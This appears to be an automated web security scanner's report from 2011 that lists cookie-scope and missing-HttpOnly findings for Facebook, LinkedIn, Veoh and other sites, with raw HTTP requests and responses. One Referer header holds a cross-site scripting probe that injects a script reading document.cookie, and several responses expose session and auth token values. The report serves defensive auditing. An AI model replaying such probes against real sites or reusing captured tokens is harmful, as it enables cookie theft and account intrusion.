10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel/?aid=148&tax=home HTTP/1.1 Host: uat.netmng.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evo5=kvrgygjr7baud%7C5SyprRh6TrnFV2ndAy2HxCPgLLX3cZ%2FVfx%2FM0biott%2BcqVbJj5aCj55h7IXdjMgE9ed9rfydUW6gLxzZ4Z8iZfTCEnvI5PEwDP8UgnDwsNwf1a3vDJnVlaVWQNH%2F7d2VqxBrm0%2Fc%2FidZYflVD0ff%2F1E5rmifbqDgfH2Gt1zhs%2F2MnA08vEEPGokDm1Bn1W68QLHQ%2FzChSJMJNtyVsrnHyb3E37wmvDfW6FFUnXFOPDqGRb7GXzLEZaSRaSPR19puBUpHlUpXwBEY7g3LfZ4F7q%2FoPuX4s88d6II7AqTrPBQvVC3dTHYL6Y342A5GTpvcniShvZas%2BmBrU%2Fz%2FqdmcKtLQoSpK8%2F1EMObPX4EqA7WzFB9kMN0WKt0l5SlxdqQCviV0iLESOVRgETizb2Os%2Fh1P9v%2FlebIMxnWdfb6%2Byln%2FJfmz2fudQYM%2FGfUhPWgueSqcoFf5wfZykby2hBxGOg%3D%3D
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:03:59 GMT Server: Apache/2.2.9 P3P: policyref="http://uat.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV" Expires: Tue, 01 Feb 2011 19:03:59 GMT Last-Modified: Tue, 01 Feb 2011 19:03:59 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: evo5=kvrgygjr7baud%7CslbpB2OTqHJebVm%2BWLYhLSxmpA%2Bk0H4X%2BmBxXDdVODzOuKT2fiN3y3Y5%2FY%2FsvrMTk5MmDBp7hV7I6KwNAhVYdGvfRM%2Bt5tHVREa3RQX0svzHDl1LVEJkUgauiKULoRLwV%2Bz9EfZ7EbNR6AyPAOiKR2YDLplc5ZP%2FSQ6vGBOIIKPOPjcxxchwc%2Bo4nA5%2BXAHnXvznrsmn%2BcXyzWJFyo%2F7gsKfwS18nNxmub3nTC7jXt6PqmgrUCGB0%2B0vqAMDbEWNWkKk8aNor%2FvzClvR9YGDE1DDjaV8XMfY5k93PKcy7%2BcHAUsxt54LRmbEVOmofd1fIHKn0lsrW9GvKMll8AI8rXfZqe1UwR5PeLBmj4zS2RGDv2trchNe4um3wRa%2BvF6pKy4VT%2BDhUwGQ4LAm8Yog8lNAItduejTtfC9gbzyZMGm7yKAmWVLRZLZBSm7SpNBnA4SM6uA0wtdfTynqTvb5Hw%3D%3D; expires=Fri, 05-Aug-2011 19:03:59 GMT; path=/; domain=.netmng.com Location: http://ad.yieldmanager.com/pixel?id=582755&id=584778&id=584789&t=2 Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: video.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Thu, 03 Feb 2011 20:33:04 GMT Expires: Thu, 03 Feb 2011 20:33:04 GMT Cache-Control: private, max-age=0 Set-Cookie: PREF=ID=1be32f5d81ed4b3b:TM=1296765184:LM=1296765184:S=XUl03TgBOSGxaiOV; expires=Sat, 02-Feb-2013 20:33:04 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: VSFE_1.0 X-XSS-Protection: 1; mode=block Connection: close
<!doctype html> <meta content="text/html; charset=UTF-8" http-equiv=content-type> <meta content="Search millions of videos from across the web." name=description> <title>Google Videos</title> <script> ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/o?id=cD5Q7abi8r4inHadbi-bnq&i=http%3A%2F%2Fa.collective-media.net%2Fadi%2Flb.buzzillions%2F%3Bpos%3Datf%3Btile%3D1%3Bdcopt%3Dist%3Bsz%3D728x90%3Bord%3D1296770389%3F&ts=1296770455256 HTTP/1.1 Host: w.ic.tynt.com Proxy-Connection: keep-alive Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e54375ce26/x22 Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /comment-iframe.g?blogID=722867207364741287&postID=3730301442720466539&blogspotRpcToken=6110411 HTTP/1.1 Host: www.blogger.com Proxy-Connection: keep-alive Referer: http://www.cloudscan.me/2011/01/abstract-white-paper-relative.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PREF=ID=9268244d0e3d1ace:TM=1294785636:LM=1294785636:S=mgdFOGdwXJw4zKJI; blogger_TID=216bd5db56d4b0a7
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html dir="ltr"><head><title>Blogger: Penetration Testing | Hoyt LLC - Post a Comment</title> <link href="http ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=Al9E9; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=Al9E9; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:20 GMT Content-Length: 30803
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=xRgPt; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=xRgPt; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:29 GMT Content-Length: 11422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /campaign/landing.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Location: http://www.facebook.com/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 05-Mar-2011 21:49:22 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:22 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/login.php P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=wLXVp; path=/; domain=.facebook.com Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:25 GMT Content-Length: 0
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=FMAWt; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/Veoh/129836657035793 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/VeohTV P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=FMAWt; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:29 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /share.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=y_9KTbq--wiemAhPZf9cZRCm; expires=Sat, 02-Feb-2013 19:19:39 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=yNjLf; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 19:19:39 GMT Content-Length: 10796
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /supermediacom HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=yP9KTbiv931zl65aXpcqa4m-; expires=Sat, 02-Feb-2013 19:19:36 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=bxxex; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 19:19:37 GMT Content-Length: 146681
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/ HTTP/1.1 Host: www.flickr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:49:30 GMT P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Set-Cookie: BX=4kc870h6km8na&b=3&s=0v; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 02-Feb-2014 21:49:30 GMT; path=/; domain=.flickr.com Set-Cookie: cookie_l10n=deleted; expires=Wed, 03-Feb-2010 21:49:29 GMT; path=/; domain=flickr.com Set-Cookie: cookie_intl=deleted; expires=Wed, 03-Feb-2010 21:49:29 GMT; path=/; domain=flickr.com Set-Cookie: search_z=t; expires=Wed, 30-Oct-2013 21:49:30 GMT; path=/; domain=.flickr.com X-Served-By: www87.flickr.mud.yahoo.com Cache-Control: private Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23029
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wholesale-Shower-Faucets_c2863 HTTP/1.1 Host: www.lightinthebox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wholesale/golf-clubs.html HTTP/1.1 Host: www.linkchina.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /in/troyd/x22 HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 Set-Cookie: bcookie="v=1&0cafcf8d-e068-4822-b520-7439b567b823"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:39:36 GMT; Path=/ Last-Modified: Thu, 27 Jan 2011 18:58:16 GMT If-Modified-Since: Thu, 27 Jan 2011 18:58:16 GMT Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Thu, 03 Feb 2011 20:25:29 GMT X-Cache: MISS from www.linkedin.com X-Cache-Lookup: MISS from www.linkedin.com:8080 Via: 1.0 www.linkedin.com (squid/3.0.STABLE20) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pub/troy-brown/07/287/56A/x22 HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 302 Moved Temporarily Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID="ajax:6393265550819748814"; Version=1; Path=/ P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Set-Cookie: leo_auth_token="GST:8umv_nS7XFzUyxeKwcm4-54LG5Af_dxZBECJyfS9zSz2oe7lnSRZnR:1296764778:7cadffe11cc6d886b438c64892ac7c2f8d826bc7"; Version=1; Max-Age=1799; Expires=Thu, 03-Feb-2011 20:56:17 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: visit=G; Expires=Tue, 21-Feb-2079 23:40:25 GMT; Path=/ Set-Cookie: bcookie="v=1&b190bc23-5ec6-4de1-a9c4-5a80edfac251"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:40:25 GMT; Path=/ Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/ Location: http://www.linkedin.com/pub/troy-brown/7/287/56a Content-Language: en-US Content-Length: 0 Date: Thu, 03 Feb 2011 20:26:18 GMT X-Cache: MISS from www.linkedin.com X-Cache-Lookup: MISS from www.linkedin.com:8080 Via: 1.0 www.linkedin.com (squid/3.0.STABLE20) Connection: keep-alive
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shareArticle HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:ZvpYDWFtWOPUWYjh_jHyedipSluAqpcn6vhruIXa2CDdWVdPpP66g5:1296760855:7d27a506e0853359e3965f871f95b1bfef8c45d6"; Version=1; Max-Age=1799; Expires=Thu, 03-Feb-2011 19:50:54 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:0561599565067721010"; Version=1; Path=/ Set-Cookie: visit=G; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/ Set-Cookie: bcookie="v=1&695a9322-0059-4252-9172-662df4a2e00f"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Length: 7453 Date: Thu, 03 Feb 2011 19:20:54 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965045525d5f4f58455e445a4a42198c;expires=Thu, 03-Feb-2011 19:51:08 GMT;path=/;httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.made-in-china.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /buzz/members/smartdesis/x22 HTTP/1.1 Host: www.mybloglog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:28:24 GMT Set-Cookie: BX=9fhlkdh6km3v8&b=3&s=1o; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.mybloglog.com P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Cache-Control: private Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 7249
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Page Not Found - MyBlogLog</title> <meta http-equiv="Cont ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.switchboard.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:39 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=18 Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:37 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=53 Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.wix.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?hl=en&tab=w1 HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /results HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /watch HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /x22 HTTP/1.1 Host: abcconstructioninc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: advertise.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
